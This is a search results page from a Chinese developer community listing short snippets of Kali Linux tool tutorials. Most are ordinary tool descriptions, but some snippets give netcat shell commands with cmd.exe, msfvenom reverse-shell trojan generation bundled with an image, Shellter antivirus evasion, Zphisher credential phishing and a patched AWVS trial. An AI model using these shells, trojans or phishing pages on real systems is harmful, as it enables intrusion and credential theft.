- 综合排序
- 最热优先
- 最新优先
- 来自专栏cjz的专栏
Kali-工具-nmap篇
我们在一个网段有多台主机要怎么去探测扫描那,可以使用如下命令进行扫描. 扫描192.168.31网段下的所有主机 /16或/24
72160编辑于 2022-12-21 - 来自专栏cjz的专栏
Kali-工具-HTTrack使用
安装HTTrack工具 apt-get install httrack 启动HTTrack工具 httrack 使用HTTrack工具爬取一个网站 proxy:定义网站代理 Action: 使用什么方式爬取
83031编辑于 2022-12-21 - 来自专栏数通
KALI LINUX密码安全工具
渗透测试工程师可以使用各种工具来获取密码哈希值,例如本地密码哈希提取工具、网络流量分析工具、数据库哈希提取工具等。 3. 在这种情况下,渗透测试工程师可以尝试使用其他工具来获取密码,例如数据库注入工具。 2. 密码复杂度:一些密码可能非常复杂,例如由随机字符组成的密码。 Hashcat Hashcat是一款用于破解哈希值的工具,它是当前市场上最快的密码破解工具之一。 一、Aircrack-ng简介 Aircrack-ng是一款用于破解Wi-Fi密码的工具,它是Aircrack和Airodump等多个工具的集合体。 捕获数据包:使用Airodump-ng工具捕获目标Wi-Fi网络的数据包,并将它们保存到文件中。 3. 分析数据包:使用Aircrack-ng工具对捕获的数据包进行分析,提取出其中的握手包。 4.
1.4K10编辑于 2024-12-03 - 来自专栏cjz的专栏
Kali-工具-sqlmap常见用法
同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3 sqlmap这个工具能干很多事情
1.1K10编辑于 2022-12-21 - 来自专栏小白安全
小白博客 kali Linux - 取证工具
在本章中,我们将学习Kali Linux中的取证工具。 p0f p0f是一个工具,只要检查捕获的数据包,即使有问题的设备位于数据包防火墙之后,也可以识别目标主机的操作系统。 PDF解析器 pdf-parser是一个解析PDF文档的工具,用于识别分析的PDF文件中使用的基本元素。 它不会呈现PDF文档。 对于PDF解析器而言,不推荐用于教科书,但是它可以完成这项工作。 DFF 这是另一个用于恢复文件的法医工具。它也有图形用户界面。打开它,键入“DFF GUI终端”和下面的Web GUI将开放。 ?
2.9K90发布于 2018-04-12 - 来自专栏全栈程序员必看
kali制作安卓免杀木马_kali工具绑捆
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。 我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可执行文件 开始安装: 1. –add-architecture i386 && apt-get update && apt-get install wine32 确认安装即可 现在我们打开shellter就可以打开运行了,工具安装完成后再
4.8K20编辑于 2022-09-24 - 来自专栏cjz的专栏
Kali-扫描工具-Nikto使用
Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto使用Perl语言编写运行,Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等. Nikto是在KaliLinux系统中默认安装的
2.2K30编辑于 2022-12-21 - 来自专栏信安之路
kali渗透测试工具方法
kali作为一个渗透测试者最受欢迎的操作系统,集成了非常多的安全工具,让渗透测试人员更方便的做一些渗透测试工作,本文来自国外某位大神的github,在这里给大家做一个分享,具体内容如下: Netcat ---- netcat是一个优秀的网络工具,在业界有“瑞士军刀”的美誉,通常在Linux系统下都自带了。 Kali nc -nv 192.168.2.12 4444 正向shell Windows nc -nlvp 4444 -e cmd.exe Kali 192.168.2.10 --ssl Linux ncat -nv 192.168.2.12 4444 --ssl tcpdump ---- tcpdump是Linux下一个网络包截取分析工具 <capture.pcap> 读取数据包文件并且以16进制显示 tcpdump -nX -r <capture.pcap> 利用host获取dns信息 ---- host是一个用来执行dns查找的小工具
1.3K00发布于 2018-08-08 - 来自专栏FreeBuf
Ubuntu安装Kali工具集:Katoolin
在真实渗透环境下往往需要一个稳定、安全、可随时操作的环境,家中的电脑不能一直开着,而且还有解决公网IP的问题,这时候我们往往需要一台vps,但是市面上的vps往往并不支持安装kali系统,只有某些较贵的 KVM构架vps可以不太稳定的安装kali系统,其他linux系统支持的渗透测试软体也并不全面,于是今天我为大家介绍一款可以直接在常见Ubuntu设备上安装全部kali工具集的程序katoolin。 之后输入 1查看软件库 2查看软件分类 3安装经典菜单通知 4安装kali菜单 5帮助 我们先输入1查看软件库 ? 输入对应数字查看软件列表并安装,或者直接输入0安装全部工具。 后面主界面的3和4用来安装菜单这里不做过多介绍。 另外注意 执行apt-get update前必须先在katoolin内删除软件源 这样很简单便安装了kali的全部工具集,是不是很方便呢。 试玩 开个msfconsole ?
3.5K71发布于 2018-02-26 - 来自专栏全栈程序员必看
kali扫描工具_nmap批量扫描
本片介绍的是Namp的Linux Kali操作系统下的使用,Nmap在Windows操作系统下的使用,点击文章===>https://blog.csdn.net/qq_41453285/article/ details/98596828 一、工具介绍 功能概述:Nmap是主动扫描工具,用于对指定的主机进行扫描 历史背景:Nmap是由Gordon Lyon设计并实现的,与1997开始发布,最初设计的目的是希望打造一款强大的端口扫描工具 ,但是随着发展,Nmap已经变为全方面的安全工具 “NSE”脚本引擎:Nmap中的该引擎提供了可以向Nmap添加新的功能模块 nmap是一个强大的工具,如果想要深入了解,可以参考书籍《诸神之眼——Nmap
3.3K20编辑于 2022-11-10 - 来自专栏kali blog
Kali Linux 网络钓鱼工具 Zphisher
Zphisher是一款功能强大的开源工具 Phishing Tool。用于对目标进行网络钓鱼攻击。Zphisher 比社会工程工具包(SET)更容易。 它包含一些由名为 Zphisher 的工具生成的模板,并为 Facebook、Instagram、谷歌、Snapchat、GitHub、雅虎、Proton 邮件、Spotify、Netflix、LinkedIn 该工具可以轻松执行网络钓鱼攻击。使用此工具,您可以在(广域网)中执行网络钓鱼。此工具可用于获取凭据,例如id、密码。 Zphisher的用途和特点: Zphisher 是开源工具。 Zphisher 是 Kali Linux 的一个工具。 Zphisher 用于网络钓鱼攻击。 Zphisher 工具是一个非常简单易用的工具。Zphisher 是用 bash 语言编写的。 Zphisher 工具是一个轻量级的工具。这不会占用额外的空间。 Zphisher 是用 bash 语言编写的。 Zphisher 为 30 多个网站创建了网络钓鱼页面。
3K10编辑于 2022-01-19 - 来自专栏紫禁玄科
Kali linux信息收集工具:netdiscover
这一个工具是基于ARP的网络扫描工具,这款工具的主要用途是通过协议,判断IP地址是否被使用,从而发现网络中存活的主机。 Netdiscover工具,既可以被动模式嗅探存活主机,也可以主动模式扫描主机,当然用户自己也可以调整发包的速度和数量 Netdiscover参数翻译 -d device:您的网络设备 -r range
1.6K20编辑于 2022-03-24 - 来自专栏kali blog
kali安装抓包工具Charles
关于 Charles 是一款著名的网络抓包工具。和我们的神器burp类似。 在kali中安装 wget -q -O - http://www.charlesproxy.com/packages/apt/PublicKey | sudo apt-key add - vi /etc 总体而言,每款抓包工具都有自身的优点和缺点。没有十全十美的工具。在后面的文章中,我们还会详细的介绍Charles的使用。需要注意的是,Charles这款工具和burp一样,都是收费的。
63510编辑于 2025-07-28 - 来自专栏cjz的专栏
Kali-工具-crunch(字典生成)
crunch工具参数 参数名 含义 max 设置最大字符串长度(必填) min 设置最小字符串长度(必填) -o 将生成的字典保存到指定文件 -t 指定密码输出的格式 -p 指定元素组合 % 代表数字
1.9K70编辑于 2022-12-21 - 来自专栏紫禁玄科
Kali Linux信息收集工具:dmitry
dmitry后面)如: dmitry -n www.baidu.com dmitry -e www.baidu.com dmitry -s www.baidu.com 记住中间的空格(前面说了kali
1.2K10编辑于 2022-03-24 - 来自专栏cjz的专栏
Kali-工具-xhydra(协议爆破)篇
简单介绍 xhydra是hydra的一个可视化工具,它可以利用众多协议进行口令、账号、密码的爆破,同样支持FPT、MYSQL、SMTP、TELNET、SSH等众多的协议爆破。
2.1K40编辑于 2022-12-21 - 来自专栏黑客技术家园
无需ROOT在手机安装kali工具
利用msfvenom生成木马 配置metasploit监听端口上线 目标主机:windows7 启动kali输入命令 msfvenom -p windows/meterpreter/reverse_tcp handler) > set lhost IP msf exploit(handler) > set lport 4444 msf exploit(handler) > exploit 然后我们来使用压缩工具将木马和图片捆绑在一起 (网上也有现成的捆绑工具) 按照下图过程进行操作 需要一张图片和一个ICO图标 目标运行后结果
2.5K40编辑于 2023-03-25 - 来自专栏IT运维技术圈
全网最全的Kali工具介绍大全
本文将kali中常用的工具进行了汇总。对每个工具的具体用途做了大概的描述。希望通过本文,能对初学kali的小伙伴有所帮助。当然里面部分工具可能随着系统版本的提高而移除,但我们仍可安装。
1.8K60编辑于 2023-02-02 Kali Linux安装AWVS漏扫工具
windows 版与Linux版,版本号 acunetix_12.0.2019年9月 2.在Kali系统中安装依赖包,执行以下命令,默认情况下Kali中已经自动安装了这些包。 root@kali:~# sudo apt-get install libxdmcp6=1:1.1.2-1.1 root@kali:~# sudo apt-get install libxcb1=1.11.1 root@kali:~# unzip AWVS12_Linux.zip root@kali:~# chmod 777 acunetix_trial.sh patch_awvs root@kali:~# [yes|no] [no] >>> yes 接受许可协议 Insert new hostname, or leave blank to use kali Hostname [kali root@kali:~# chattr +i /home/acunetix/.acunetix_trial/data/license/license_info.json root@kali:~# rm
4.9K20编辑于 2022-12-28- 来自专栏kali blog
kali下的网络嗅探工具
dsniff dsniff 是一个密码侦测工具,他能够自动分析端口上收到的某些协议的数据包,并获取相应的密码。
1.3K20编辑于 2021-12-17
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号